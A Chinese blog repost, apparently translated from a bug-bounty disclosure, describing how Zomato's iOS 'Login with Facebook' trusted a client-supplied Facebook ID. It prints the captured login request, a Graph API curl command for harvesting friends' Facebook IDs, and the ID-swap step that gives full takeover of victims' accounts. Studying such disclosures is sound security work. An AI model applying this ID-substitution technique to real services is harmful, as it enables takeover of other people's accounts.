使用受害者的Facebook ID收购Zomato帐户

Admin 2020-05-31 107人围观 ,发现0个评论 Zomato帐户Facebook IDweb安全

这是一个问题,几个月前我曾向Zomato报告,攻击者可能会破坏将其Facebook与Zomato关联的任何用户帐户。 而且由于当今大多数人都使用“通过Facebook登录”,所以我实际上能够访问1000多个用户帐户。

image.png 使用受害者的Facebook ID收购Zomato帐户 Web安全

在iOS应用上使用Facebook登录时,这是已发送到服务器的请求:

POST /v2/auth.json?presentlat=xxxxxxx&useragent=model_iPod%20touch_os_9.3.5v_7.0_t_iPod5,1&app_version=7.0&session_id=41&app_run_id=21&presentlon=xxxxxxxx&lang=en&push_permission=1&isFacebook=true&channel_url=&uuid=█████████ HTTP/1.1
Host: www.yir6.cn
Accept-Language: en-IN;q=1, nl-IN;q=0.9, it-IN;q=0.8, de-IN;q=0.7, fr-IN;q=0.6
Accept: /
User-Agent: Zomato/6.6.9 (iPod touch; iOS 9.3.5; Scale/2.00)X-Zomato-API-Key: █████████
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: keep-alive
app_version: 7.0
Cookie: PHPSESSID=██████████; fbcity=1; fbtrack=c9bce885893ad8387ae3dc855d6f5b97; zl=en
Content-Length: 984
Accept-Encoding: gzipaccess_token=&client_id=zomato_ios_v2&fb_permission=%5B%22user_friends%22%2C%22email%22%2C%22contact_email%22%2C%22public_profile%22%5D&fb_token=████████&fbdata=%7B%0A%20%20%22link%22%20%3A%20%22https%3A%5C%2F%5C%2Fwww.facebook.com%5C%2Fapp_scoped_user_id%5C%2F█████%5C%2F%22%2C%0A%20%20%22id%22%20%3A%20%22██████████%22%2C%0A%20%20%22first_name%22%20%3A%20%22Bhavuk%22%2C%0A%20%20%22name%22%20%3A%20%22Bhavuk%20Jain%22%2C%0A%20%20%22gender%22%20%3A%20%22male%22%2C%0A%20%20%22last_name%22%20%3A%20%22Jain%22%2C%0A%20%20%22email%22%20%3A%20%22█████████%40yahoo.co.in%22%2C%0A%20%20%22locale%22%20%3A%20%22en_US%22%2C%0A%20%20%22timezone%22%20%3A%205.5%2C%0A%20%20%22updated_time%22%20%3A%20%222016-12-24T21%3A55%3A30%2B0000%22%2C%0A%20%20%22verified%22%20%3A%20true%0A%7D&fbid=█████

仔细查看,我发现API还在请求的参数中发送了fbid。 因此,我尝试使用另一个Facebook ID进行更改。 但是如何找到受害者的Facebook ID,因为不同的应用程序会有所不同。 通过使用Facebook的Graph API,您可以找到您的朋友以及使用Zomato使用“通过Facebook登录”的二等朋友的列表。 通过发送您的Facebook生成的Acceess令牌,此Graph API请求可以返回您的朋友Facebook ID。

curl -i -X GET \"https://graph.facebook.com/v2.10/me/friends?access_token=xxxxxxxx"

现在,通过使用此Facebook ID并将其替换为Zomato的请求,它绕过了登录,使我可以完全控制受害者的帐户。 游戏结束!

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客